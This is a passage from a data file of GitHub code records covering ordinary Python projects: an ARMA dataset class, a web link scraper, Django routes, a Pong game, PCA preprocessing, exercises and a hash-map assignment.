Examples:\n >>> from tint.datasets import Arma\n <BLANKLINE>\n >>> arma = Arma()\n >>> arma.download(split=\"train\")\n >>> x_train = arma.preprocess(split=\"train\")[\"x\"]\n >>> y_train = arma.preprocess(split=\"train\")[\"y\"]\n \"\"\"\n\n def __init__(\n self,\n times: int = 50,\n features: int = 50,\n subset: int = 5,\n ar: list = None,\n ma: list = None,\n data_dir: str = os.path.join(\n os.path.split(file_dir)[0],\n \"data\",\n \"arma\",\n ),\n batch_size: int = 32,\n prop_val: float = 0.2,\n n_folds: int = None,\n fold: int = None,\n num_workers: int = 0,\n seed: int = 42,\n ):\n super().__init__(\n data_dir=data_dir,\n batch_size=batch_size,\n prop_val=prop_val,\n n_folds=n_folds,\n fold=fold,\n num_workers=num_workers,\n seed=seed,\n )\n\n self.times = times\n self.features = features\n self.subset = subset\n self.ar = ar or np.array([2, 0.5, 0.2, 0.1])\n self.ma = ma or np.array([2])\n\n @staticmethod\n def collate_fn(batch: list) -> (th.Tensor, th.Tensor):\n return th.stack([b[\"x\"] for b in batch]), None\n\n def download(\n self,\n train_size: int = 1000,\n test_size: int = 100,\n split: str = \"train\",\n ):\n assert (\n ArmaProcess is not None\n ), \"You must install statsmodels to generate arma data.\"\n file = os.path.join(self.data_dir, f\"{split}.npz\")\n\n if split == \"train\":\n exp = train_size\n elif split == \"test\":\n exp = test_size\n else:\n raise NotImplementedError\n\n # Generate data\n data_arma = ArmaProcess(ar=self.ar, ma=self.ma).generate_sample(\n nsample=(exp, self.times, self.features),\n axis=1,\n )\n\n with open(file, \"wb\") as fp:\n pkl.dump(obj=data_arma, file=fp)\n\n def preprocess(self, split: str = \"train\") -> dict:\n file = os.path.join(self.data_dir, f\"{split}.npz\")\n\n # Load data\n with open(file, \"rb\") as fp:\n features = pkl.load(file=fp)\n\n # There is no labels here\n return {\"x\": th.Tensor(features)}\n\n def true_saliency(self, split: str = \"train\", dim: int = 1) -> th.Tensor:\n file = os.path.join(self.data_dir, f\"{split}.npz\")\n\n # Load data\n with open(file, \"rb\") as fp:\n features = th.from_numpy(pkl.load(file=fp)).float()\n\n outputs = th.zeros_like(features)\n\n if dim == 1:\n # Create a fixed permutation for each experiment\n for i in range(len(features)):\n perm = th.randperm(\n self.features,\n generator=th.Generator().manual_seed(self.seed),\n )\n outputs[\n i,\n int(self.times / 4) : int(3 * self.times / 4),\n perm[: self.subset],\n ] = 1\n\n elif dim == 2:\n for i in range(len(features)):\n t_rand = th.randint(\n low=0,\n high=self.times - self.subset,\n size=(1,),\n generator=th.Generator().manual_seed(self.seed),\n )\n outputs[\n i,\n t_rand : t_rand + self.subset,\n int(self.features / 4) : int(3 * self.features / 4),\n ] = 1\n\n else:\n raise NotImplementedError(\"dim must be 1 or 2\")\n\n return outputs\n\n @staticmethod\n def get_white_box(\n inputs: th.Tensor,\n true_saliency: th.Tensor,\n ) -> th.Tensor:\n \"\"\"\n Create a white box regressor to be interpreted.\n\n Args:\n inputs (th.Tensor): The input data.\n true_saliency (th.Tensor): The true saliency.\n\n Returns:\n th.Tensor: Output data.\n \"\"\"\n outputs = th.zeros(inputs.shape).to(inputs.device)\n\n # Populate the features\n outputs[true_saliency.bool()] = inputs[true_saliency.bool()]\n\n outputs = (outputs**2).sum(dim=-1)\n return outputs\n","repo_name":"josephenguehard/time_interpret","sub_path":"tint/datasets/arma.py","file_name":"arma.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"1015376564","text":"try:\n from nut2 import PyNUTClient\nexcept Exception as E:\n print(__file__, E, 'pip install nut2')\n\n\nfrom Inc.Log import Log\nfrom ._Common import TProvider\n\n\nclass TProviderUpsNut(TProvider):\n def __init__(self, aName):\n self.Name = aName.encode(\"utf8\")\n\n def Read(self, aNotUsed = None):\n Client = PyNUTClient()\n #Client.help()\n #Client.list_ups()\n Data = Client.list_vars(self.Name)\n\n Result = {}\n Result['Voltage'] = float(Data['input.voltage'])\n Result['Status'] = Data['ups.status']\n Result['default'] = Result['Voltage']\n return Result\n\n def Get(self, aKey = 'default'):\n return self.GetKey(aKey)\n","repo_name":"VladVons/py-relay","sub_path":"src/Plugin/Providers/UpsNut.py","file_name":"UpsNut.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25674827215","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 22 06:36:33 2017\n\n@author: 代码医生 qq群:40016981,公众号:xiangyuejiqiren\n@blog:http://blog.csdn.net/lijin6249\n\"\"\"\nimport tensorflow as tf\n\nglobal_step = tf.Variable(0, trainable=False)\n\ninitial_learning_rate = 0.1 #初始学习率\n\nlearning_rate = tf.train.exponential_decay(initial_learning_rate,\n global_step,\n decay_steps=10,decay_rate=0.9)\nopt = tf.train.GradientDescentOptimizer(learning_rate)\n\nadd_global = global_step.assign_add(1)\nwith tf.Session() as sess:\n tf.global_variables_initializer().run()\n print(sess.run(learning_rate))\n for i in range(20):\n g, rate = sess.run([add_global, learning_rate])\n print(g, rate)\n","repo_name":"Lebhoryi/learning_tf","sub_path":"6-3 退化学习率.py","file_name":"6-3 退化学习率.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"71270245585","text":"from unicodedata import name\nfrom numpy import full, full_like\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n#Parameter Setting\nurl = 'https://hdcservice.moph.go.th/hdc/main/index.php'\nreqs = requests.get(url)\nsoup = BeautifulSoup(reqs.text, 'html.parser')\nnames = soup.find_all('a') # find all names\nnames_cut = []\nurls = []\n\n#Find all text and links for append in names_cut and urls list\nfor link in soup.find_all('a'):\n cut = link.text\n names_cut.append(cut)\n\n full_url = str(link.get('href'))\n if str(full_url)[:2] == '..': #check is link has .. in front fill https:// and merge it\n full_url = 'https://hdcservice.moph.go.th/hdc/' + full_url[3:]\n if str(full_url)[:4] == '/hdc':\n full_url = 'https://hdcservice.moph.go.th/hdc/' + full_url[5:]\n urls.append(full_url)\n\ndf_names = pd.DataFrame(names_cut, columns=['name']) #Create dataframe for names\ndf_urls = pd.DataFrame(urls, columns=['url']) #Create dataframe for urls\ndf = pd.concat([df_names, df_urls], axis=1) #Concat dataframe\n\nprint(df.head(10))\n\ndf.to_csv('link_csv/All_link.csv', sep='|', index=False, encoding='utf-8-sig') #Save dataframe to csv file","repo_name":"cusniwtt/HDC-bot-scrapping","sub_path":"pull_link.py","file_name":"pull_link.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32093976981","text":"from django.urls import path\nfrom . import views\n\napp_name = 'cards'\n\nurlpatterns = [\n path('', views.CardsListView.as_view(), name='card-list-all'),\n path('sets/', views.CardSetList.as_view(), name='cardsets'),\n path('sets/new/', views.CardSetCreate.as_view(), name='cardsets-new'),\n path('sets/<slug:slug>/update/', views.CardSetUpdate.as_view(), name='cardsets-upd'),\n path('cards/search', views.card_search, name='card-search'),\n path('cards/<slug>/player/', views.cards_list_player, name='card-list-player'),\n path('cards/<slug>/set/', views.card_list, name='card-list'),\n path('cards/new/', views.CardCreate.as_view(), name='card-new-all'),\n path('cards/<slug>/new/', views.CardNewSet.as_view(), name='card-new-set'),\n path('cards/<int:pk>/', views.CardsDetail.as_view(), name='card-det'),\n path('cards/<int:pk>/update/', views.CardUpdate.as_view(), name='card-upd'),\n]","repo_name":"guitardave/bbcards","sub_path":"cards/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30939724742","text":"from apyori import apriori\nfrom task6 import *\n\ndef convert_apriori_results_to_pandas_df(results):\n\trules = []\n\t\n\tfor rule_set in results:\n\t\tfor rule in rule_set.ordered_statistics:\n\t\t\t# items_base = left side of rules, items_add = right side\n\t\t\t# support, confidence and lift for respective rules\n\t\t\trules.append([','.join(rule.items_base), ','.join(rule.items_add), rule_set.support, rule.confidence, rule.lift])\n\t\n\t# Cast to Pandas dataframe\n\treturn pd.DataFrame(rules, columns=['Left_side', 'Right_side', 'Support', 'Confidence', 'Lift'])\n\n# Sort list by type. Print sorted values by count.\ndef printOrderBys(type, count, order=False):\n\tglobal result_df\n\tresults = result_df.sort_values(by=type, ascending=order)\n\tprint(type + \" values\")\n\tprint(results.head(count))\n\n# Display entire columns\npd.set_option('display.max_colwidth', -1)\n\ndf = getDF() # From task6.py\nresult_df = None\n\n# names=['Host', 'Datetime', 'Request', 'Step', 'Session', 'User']\ntransactions = df.groupby(['Session'])['Request'].apply(list)\n\n# Cast to Python list\ntransaction_list = list(transactions)\nresults = list(apriori(transaction_list, min_support=0.02))\n\nresult_df = convert_apriori_results_to_pandas_df(results)\n\n# Order by lift\nprintOrderBys('Lift', 100)\n\n# Order by confidence\nprintOrderBys('Confidence', 100)","repo_name":"dlime12/Data-Analysis-Python","sub_path":"case_study2/web_2.py","file_name":"web_2.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10927063546","text":"import pygame\r\nimport numpy as np\r\nfrom random import randrange\r\n\r\npygame.init()\r\npygame.mixer.init()\r\nclass Py3d_data:\r\n def __init__(self):\r\n self.running = True\r\n self.w = 640\r\n self.h = 480\r\n pygame.mixer.init()\r\n\r\n self.screen_size = np.array([640,480])\r\n self.perspective = 300\r\n self.color_screen = (255,255,255)\r\n self.screen=pygame.display.set_mode((self.w,self.h))\r\n self.bgColor = np.array([0,0,0],float)\r\n\r\n self.songPath = \"osuMap/\"\r\n self.songdif = \"extra.osu\"\r\n self.beatmap = None\r\n \r\n self.game_mover_spd = 10\r\n self.game_length = 100\r\n self.game_sync = 0.4\r\n self.game_volumeAudio = 0.4\r\n self.game_volumeHit = 1.0\r\n self.fps = 1\r\n \r\n #old var\r\n self.width = self.w\r\n self.height = self.h\r\n \r\n def set_BeatmapData(self,beatmapData):\r\n self.beatmap = beatmapData\r\n\r\npy3d_data = Py3d_data()\r\n\r\n\r\n","repo_name":"pbh980915/python_2021_3d_rhythmGame_use_osuData","sub_path":"T3dData.py","file_name":"T3dData.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39231154777","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 17 10:08:58 2022\n\n@author: alumno\n\"\"\"\n\nfrom multiprocessing import Process, Lock\nfrom multiprocessing import Value, Array\n\nN = 4 # cantidad total de procesos\n\ndef task(common, tid, critical, lock):\n a = 0\n for i in range(100):\n print(f'{tid}−{i}: Non−critical Section')\n a += 1\n print(f'{tid}−{i}: End of non−critical Section')\n critical[tid] = 1\n \n lock.acquire() # nuestro wait\n \n try:\n print(f'{tid}−{i}: Critical section')\n v = common.value + 1\n print(f'{tid}−{i}: Inside critical section')\n common.value = v\n print(f'{tid}−{i}: End of critical section')\n critical[tid] = 0\n finally:\n lock.release() # nuestro signal\n\n \n\ndef main():\n lock = Lock()\n lp = []\n common = Value('i', 0)\n critical = Array('i', [0]*N)\n for tid in range(N):\n lp.append(Process(target=task, args=(common, tid, critical, lock)))\n print (f\"Valor inicial del contador {common.value}\")\n for p in lp:\n p.start()\n for p in lp:\n p.join()\n print (f\"Valor final del contador {common.value}\")\n print (\"fin\")\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"vGuejes/CritSectionSem","sub_path":"lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39013915762","text":"\"\"\"\nRandom noise pattern through uniform filter.\n\"\"\"\n\nimport numpy as np\nfrom scipy.ndimage import uniform_filter\nfrom PIL import Image\n\n# -----------------------------------------------------------------------------\n# *** Define parameters\n\n# Size of texture [pixels]:\ntplSze = (1920, 1200)\n\n# Size of uniform filter [pixels]:\nvarUniFlt = 6\n\n# Mean pixel intensity [RGB intensity, 0 to 255]:\nvarPix = ((-0.71 + 1.0) * 0.5) * 255.0 # 37\n\n# Standard deviation of pixel intensity before smoothing [RGB intensity, 0 to\n# 255]:\nvarSd = ((-0.5294117647058824 + 1.0) * 0.5) * 255.0 # 60.0\n\n# Output path (mean intensity, standard deviation, and filter size left open):\nstrPthOut = '/home/john/Desktop/random_texture_mne_{}_sd_{}_fltr_{}.png'\n\n# -----------------------------------------------------------------------------\n# *** Create texture\n\n# Create random noise array:\naryRndn = np.random.randn(tplSze[1], tplSze[0])\n\n# Scale variance:\naryRndn = np.multiply(aryRndn, varSd)\n\n# Scale mean pixel intensity:\naryRndn = np.add(aryRndn, varPix)\n\n# Apply filter:\naryRndnS = uniform_filter(aryRndn, size=varUniFlt)\n\n# Avoid out of range values (set to back or white accordingly):\naryLgc = np.less(aryRndnS, 0.0)\naryRndnS[aryLgc] = 0.0\naryLgc = np.greater(aryRndnS, 255.0)\naryRndnS[aryLgc] = 255.0\n\n# Cast to interget:\naryRndnS = np.around(aryRndnS).astype(np.uint8)\n\n# -----------------------------------------------------------------------------\n# *** Save texture\n\n# Create image:\nobjImg = Image.fromarray(aryRndnS, mode='L')\n\n# Save image to disk:\nobjImg.save(strPthOut.format(str(np.around(varPix)).split('.')[0],\n str(np.around(varSd)).split('.')[0],\n str(varUniFlt)))\n# -----------------------------------------------------------------------------\n","repo_name":"ingo-m/PacMan","sub_path":"stimuli/experiment/miscellanea/random_texture.py","file_name":"random_texture.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26793834870","text":"import pygame\nfrom sys import exit\nimport random\nclass Pong(pygame.sprite.Sprite):\n def __init__(self, surface, colour, player, dimensions):\n super().__init__()\n self.image = surface\n self.image.fill(colour)\n self.colour = colour\n self.player = player\n self.dimensions = dimensions\n if self.player == 1:\n self.rect = self.image.get_rect(midleft=(0,int(dimensions[1]/2)))\n else:\n self.rect = self.image.get_rect(midright=(dimensions[0],int(dimensions[1]/2)))\n def movement(self):\n keys = keys = pygame.key.get_pressed()\n if self.player == 1:\n if keys[pygame.K_w]:\n self.rect.y -= 10\n elif keys[pygame.K_s]:\n self.rect.y += 10\n else:\n if keys[pygame.K_UP]:\n self.rect.y -= 10\n elif keys[pygame.K_DOWN]:\n self.rect.y += 10\n def check_limits(self):\n if self.rect.bottom >= self.dimensions[1]:\n self.rect.bottom = self.dimensions[1]\n elif self.rect.top < 0:\n self.rect.top = 0\n def update(self):\n self.movement()\n self.check_limits()\n\nclass Ball():\n def __init__(self, dimensions, r, colour, screen):\n super().__init__()\n self.r = r\n self.colour = colour\n self.screen = screen\n self.dimensions = dimensions\n self.pong_sound = pygame.mixer.Sound('Pong/sounds/pong_ricochet.mp3')\n self.pong_sound.set_volume(0.5)\n self.wall_sound = pygame.mixer.Sound('Pong/sounds/wall_ricochet.mp3')\n self.wall_sound.set_volume(0.5)\n self.goal_sound = pygame.mixer.Sound('Pong/sounds/goal.mp3')\n self.goal_sound.set_volume(0.5)\n self.initial_direction()\n \n def draw(self):\n self.rect = pygame.draw.circle(self.screen, self.colour, [self.x, self.y], self.r)\n\n \n def movement(self):\n self.x += round(self.x_multiplier*2*self.x_direction)\n self.y += round(self.y_multiplier*2*self.y_direction)\n \n def initial_direction(self):\n self.x = self.dimensions[0]//2\n self.y = self.dimensions[1]//2\n directions = (1,-1)\n self.x_multiplier = 1\n self.y_multiplier = random.randint(0,1)\n self.x_direction = directions[random.randint(0,1)]\n self.y_direction = directions[random.randint(0,1)]\n \n def reverse(self,object):\n if object == 'pong':\n self.x_direction *= -1\n else:\n self.y_direction *= -1\n if self.x_multiplier >= 12:\n self.multipler = 12\n else:\n self.x_multiplier += 0.4\n self.y_multiplier += 0.4\n\n def score(self, score_dictionary):\n if self.x > self.dimensions[0]:\n self.goal_sound.play()\n score_dictionary['Red'] = score_dictionary.get('Red') + 1\n self.initial_direction()\n self.colour = 'White'\n if self.x < 0:\n self.goal_sound.play()\n score_dictionary['Blue'] = score_dictionary.get('Blue') + 1\n self.initial_direction()\n self.colour = 'White'\n return score_dictionary\n\ndef initialise(dimensions):\n pygame.init()\n screen_dimensions = dimensions\n pong_width = 10\n pong_length = int(screen_dimensions[0]/4)\n screen = pygame.display.set_mode(screen_dimensions)\n pygame.display.set_caption('Pong')\n score_font = pygame.font.Font('Pong/font/ARCADE_N.TTF', 40)\n clock = pygame.time.Clock()\n players = pygame.sprite.Group()\n background = pygame.Surface(screen_dimensions)\n top_wall = pygame.draw.line(background, 'Black', (0,0), (screen_dimensions[0],0), 1)\n bottom_wall = pygame.draw.line(background, 'Black', (0,screen_dimensions[1]-1), (screen_dimensions[0],screen_dimensions[1]-1), 1)\n walls = (top_wall,bottom_wall)\n pong_red = pygame.Surface([pong_width,pong_length])\n pong_blue = pygame.Surface([pong_width,pong_length])\n player1 = Pong(pong_red, 'Red', 1, screen_dimensions)\n player2 = Pong(pong_blue, 'Blue', 2, screen_dimensions)\n players.add(player1, player2)\n ball = Ball(screen_dimensions, 10, 'White', screen)\n return screen, clock, background, walls, players, ball, score_font\n\ndef checkcollision(walls, players, ball):\n for player in players.sprites():\n if player.rect.colliderect(ball.rect):\n ball.reverse('pong')\n ball.colour = player.colour\n ball.pong_sound.play()\n for wall in walls:\n if wall.colliderect(ball.rect):\n ball.reverse('wall')\n ball.wall_sound.play()\n\ndef display_score(screen, score, score_font, dimensions):\n score_surf = score_font.render(f\"{score['Red']} - {score['Blue']}\", False,(64,64,64))\n score_rect = score_surf.get_rect(center = (dimensions[0]//2,50))\n screen.blit(score_surf, score_rect)\n\ndef check_score(score, game_active):\n if abs(score['Blue']-score['Red']) > 1 or max(score.values()) == 3:\n maxkey = max(score, key=score.get)\n win_msg = f\"{maxkey} wins\"\n game_active = 2\n return win_msg, game_active\n else:\n return None, game_active\n\ndef display_message(screen, score_font, win_msg, dimensions):\n message_surf = score_font.render(win_msg, False,(64,64,64))\n message_rect = message_surf.get_rect(center = (dimensions[0]//2,dimensions[1]//2))\n screen.blit(message_surf, message_rect)\n\ndef run():\n screen, clock, background, walls, players, ball, score_font = initialise((800,800))\n score = {'Red':0, 'Blue':0}\n title_font = pygame.font.Font('Pong/font/ARCADE_N.TTF', 40)\n game_active = 0\n while True:\n if game_active == 0:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n exit()\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n game_active = 1\n screen.blit(background,(0,0))\n display_message(screen, title_font, f'Pong', ball.dimensions)\n pygame.display.update()\n clock.tick(10)\n elif game_active==1:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n players.clear(screen,background)\n screen.blit(background,(0,0))\n players.draw(screen)\n ball.draw()\n checkcollision(walls, players, ball)\n ball.movement()\n players.update()\n score = ball.score(score)\n display_score(screen, score, score_font, ball.dimensions)\n win_msg, game_active = check_score(score, game_active)\n pygame.display.update()\n clock.tick(120)\n\n elif game_active == 2:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n exit()\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n run()\n players.clear(screen,background)\n screen.blit(background,(0,0))\n display_message(screen, score_font, win_msg, ball.dimensions)\n pygame.display.update()\n clock.tick(10)\nif __name__ == \"__main__\":\n run() ","repo_name":"Kayse-Johnson/Pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38844359739","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\n\n\ndef preprocess(raw_file):\n df = pd.read_csv(raw_file)\n df = df.iloc[200:]\n df.loc[df['home_pitcher_prev_ip'] < 0, 'home_pitcher_prev_ip'] = 0\n df.loc[df['home_pitcher_prev_ip'] < 20, 'home_pitcher_prev_era'] = 6.00\n df.loc[df['home_pitcher_curr_ip'] < 20, 'home_pitcher_curr_era'] = df['home_pitcher_prev_era']\n df.loc[df['away_pitcher_prev_ip'] < 0, 'away_pitcher_prev_ip'] = 0\n df.loc[df['away_pitcher_prev_ip'] < 20, 'away_pitcher_prev_era'] = 6.00\n df.loc[df['away_pitcher_curr_ip'] < 20, 'away_pitcher_curr_era'] = df['away_pitcher_prev_era']\n df.insert(loc=11, column='pitcher_adv', value= df['home_pitcher_adv'] + df['away_pitcher_adv'])\n df.drop(columns=['home_pitcher_curr_ip', 'away_pitcher_curr_ip', 'home_pitcher_adv', 'away_pitcher_adv'], inplace=True)\n df.reset_index(drop=True, inplace=True)\n return df\n\n \ndef normalize(df, df_test, columns):\n x = df.values\n x_test = df_test.values\n scaler = preprocessing.MinMaxScaler()\n x_scaled = scaler.fit_transform(x)\n x_scaled_test = scaler.transform(x_test)\n df = pd.DataFrame(x_scaled, columns=columns)\n df_test = pd.DataFrame(x_scaled_test, columns=columns)\n return x_scaled, df, x_scaled_test, df_test\n\n\ndef standardize(df, df_test, columns):\n x = df.values\n x_test = df_test.values\n scaler = preprocessing.StandardScaler()\n x_scaled = scaler.fit_transform(x)\n x_scaled_test = scaler.transform(x_test)\n df = pd.DataFrame(x_scaled, columns=columns)\n df_test = pd.DataFrame(x_scaled_test, columns=columns)\n return x_scaled, df, x_scaled_test, df_test\n\n\ndef principal_component_analysis(x, x_test, column_names, n=None):\n if n == None:\n n = min(x.shape[0], x.shape[1])\n pca = PCA(n_components=n)\n p_comp = pca.fit_transform(x)\n p_comp_test = pca.transform(x_test)\n plt.matshow(pca.components_,cmap='viridis')\n plt.yticks([0,1,2,3,4,5,6],['1st Comp','2nd Comp','3rd Comp', '4th Comp', '5th Comp', '6th Comp', '7th Comp'],fontsize=10)\n plt.colorbar()\n plt.xticks(range(len(column_names)),column_names,rotation=65,ha='left')\n plt.tight_layout()\n plt.show()\n plt.clf()\n columns = []\n nums = []\n for i in range(n):\n nums.append(i)\n columns.append('p_c_'+str(i+1))\n df = pd.DataFrame(data=p_comp, columns=columns)\n df_test = pd.DataFrame(data=p_comp_test, columns=columns)\n ev = pca.explained_variance_ratio_\n plt.plot(ev, marker='o')\n plt.xticks(nums, labels=list(np.array(nums)+1))\n plt.show()\n return df, df_test\n\n\nif __name__ == '__main__':\n df_17 = preprocess('data/2017-regularLabeledRawNew.csv')\n df_18 = preprocess('data/2018-regularLabeledRawNew.csv')\n df = df_17.append(df_18, ignore_index=True)\n df.to_csv('data/17-18-regularPP.csv')\n df_test = preprocess('data/2019-regularLabeledRawNew.csv')\n df_test.to_csv('data/2019-regularPP.csv')\n to_process = df.drop(columns = ['date', 'home_team', 'away_team', 'fir_result'])\n to_process_test = df_test.drop(columns = ['date', 'home_team', 'away_team', 'fir_result'])\n x_norm, df_norm, x_norm_test, df_norm_test = normalize(to_process, to_process_test, to_process.columns.values)\n df_norm_cent = df_norm - df_norm.mean()\n df_norm_cent_test = df_norm_test - df_norm.mean()\n df_norm_cent['label'] = df['fir_result']\n df_norm_cent_test['label'] = df_test['fir_result']\n df_norm_cent.to_csv('data/17-18-norm-centered.csv')\n df_norm_cent_test.to_csv('data/2019-norm-centered.csv')\n x_std, df_std, x_std_test, df_std_test = standardize(to_process, to_process_test, to_process.columns.values)\n df2 = df.copy()\n df_std['label'] = df['fir_result']\n df_std_test['label'] = df_test['fir_result']\n df_std.to_csv('data/17-18-standardized.csv')\n df_std_test.to_csv('data/2019-standardized.csv')\n df_pc, df_pc_test = principal_component_analysis(x=x_norm, x_test=x_norm_test, column_names=to_process.columns)\n df_pc['label'] = df['fir_result']\n df_pc_test['label'] = df_test['fir_result']\n df_pc.to_csv('data/17-18-pca-norm.csv')\n df_pc_test.to_csv('data/2019-pca-norm.csv')\n","repo_name":"gmjohns/bookie","sub_path":"src/msfapi/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"13003103328","text":"import sys\nsys.stdin = open(\"[TST]바이러스_input.txt\", \"r\")\n\ndef DFS(no):\n # 현재 컴퓨터에서 방문안한 연결된 컴퓨터를 따라가면서 방문표시하고 카운트\n global count\n if visited[no] == 0:\n visited[no] = 1\n count += 1\n for i in range(1, N + 1):\n if data[no][i] == 1:\n DFS(i)\n\n\nN = int(input())\nM = int(input())\ndata = [[0] * (N + 1) for _ in range(N + 1)] # 인접행렬\nvisited = [0] * (N + 1) # 방문표시\nfor i in range(M):\n s, e = map(int, input().split())\n data[s][e] = data[e][s] = 1 # 연결체크\ncount = 0\nDFS(1) # 1번 컴퓨터부터 시작\nprint(count - 1)\n\n###################################################################################\n\n# 선생님 풀이\ndef FF(n):\n # 현재 컴퓨터에서 방문안한 연결된 컴퓨터를 따라가면서 방문표시하고 카운트\n global sol\n chk[n] = 1\n sol += 1\n for i in range(1, N+1): # 연결된 컴퓨터(열)\n if arr[n][i] and chk[i] == 0:\n FF(i)\n\nN = int(input())\nM = int(input())\nchk = [0]*(N+1) #방문표시\narr = [[0]*(N+1) for _ in range(N+1)] #인접행렬\nfor i in range(M):\n s, e = map(int, input().split())\n arr[s][e] = arr[e][s] = 1 # 연결체크\n\nsol = 0\nFF(1) # 1번 컴퓨터부터 시작\nprint(sol-1)","repo_name":"hongyong3/TIL","sub_path":"Algorithm/문제/수업/D-13t/AD/[TST]바이러스.py","file_name":"[TST]바이러스.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4653932505","text":"# Course: CS261 - Data Structures\n# Assignment: 5.1 hash_map\n# Student: Jeff Stone - 934256195\n# Description: This program implements the HashMap class by implementing the\n# following methods:\n# put()\n# get()\n# remove()\n# contains_key()\n# clear()\n# empty_buckets()\n# resize_table()\n# table_load()\n# get_keys()\n\n\n# Import pre-written DynamicArray and LinkedList classes\nfrom a5_include import *\n\n\ndef hash_function_1(key: str) -> int:\n \"\"\"\n Sample Hash function #1 to be used with A5 HashMap implementation\n DO NOT CHANGE THIS FUNCTION IN ANY WAY\n \"\"\"\n hash = 0\n for letter in key:\n hash += ord(letter)\n return hash\n\n\ndef hash_function_2(key: str) -> int:\n \"\"\"\n Sample Hash function #2 to be used with A5 HashMap implementation\n DO NOT CHANGE THIS FUNCTION IN ANY WAY\n \"\"\"\n hash, index = 0, 0\n index = 0\n for letter in key:\n hash += (index + 1) * ord(letter)\n index += 1\n return hash\n\n\nclass HashMap:\n def __init__(self, capacity: int, function) -> None:\n \"\"\"\n Init new HashMap based on DA with SLL for collision resolution\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n self.buckets = DynamicArray()\n for _ in range(capacity):\n self.buckets.append(LinkedList())\n self.capacity = capacity\n self.hash_function = function\n self.size = 0\n\n def __str__(self) -> str:\n \"\"\"\n Return content of hash map t in human-readable form\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n out = ''\n for i in range(self.buckets.length()):\n list = self.buckets.get_at_index(i)\n out += str(i) + ': ' + str(list) + '\\n'\n return out\n\n\n def clear(self) -> None:\n \"\"\"\n This method clears the content of the hash map without changing the underlying\n hash table capacity.\n \"\"\"\n for index in range(self.capacity):\n for node in self.buckets.get_at_index(index):\n self.buckets.get_at_index(index).remove(node.key)\n self.size -= 1\n\n return\n\n\n def get(self, key: str) -> object:\n \"\"\"\n This method returns the value associated with the given key.\n If the key is not in the hash map, the method returns None.\n :param key: the key to get\n :return: the value object associated with the key or None if empty\n \"\"\"\n hash = self.hash_function(key)\n index = hash % self.capacity\n list = self.buckets.get_at_index(index)\n\n if list.contains(key):\n for node in list:\n if node.key == key:\n return node.value\n\n return None\n\n\n def put(self, key: str, value: object) -> None:\n \"\"\"\n This method updates the key:value pair in the hash map.\n If a given key already exists in the hash map, its associated\n value is replaced with the new value.\n If a given key is not in the hash map, a key:value pair is added.\n :param: the key where the value is to be inserted\n :param key: key for inserting the value\n :param value: the value to be inserted\n \"\"\"\n hash = self.hash_function(key)\n index = hash % self.capacity\n\n if self.contains_key(key):\n for node in self.buckets.get_at_index(index):\n if node.key is key:\n node.value = value\n else:\n self.buckets.get_at_index(index).insert(key, value)\n self.size += 1\n\n\n def remove(self, key: str) -> None:\n \"\"\"\n This method removes the given key and its associated value from the hash map.\n If a given key is not in the hash map, the method does nothing.\n :param key: key to be removed from hash map\n \"\"\"\n hash = self.hash_function(key)\n index = hash % self.capacity\n\n # if hash map contains the key find node and remove it\n if self.contains_key(key):\n for node in self.buckets.get_at_index(index):\n if node.key == key:\n self.buckets.get_at_index(index).remove(node.key)\n\n self.size -= 1\n\n return\n\n\n def contains_key(self, key: str) -> bool:\n \"\"\"\n This method returns True if the given key is in the hash map, otherwise it returns False.\n An empty hash map does not contain any keys.\n :param key: key to find\n :return: returns True if the key is in the hash map, otherwise returns False\n \"\"\"\n hash = self.hash_function(key)\n index = hash % self.capacity\n list = self.buckets.get_at_index(index) #get a singly linked list\n\n if list.contains(key) is 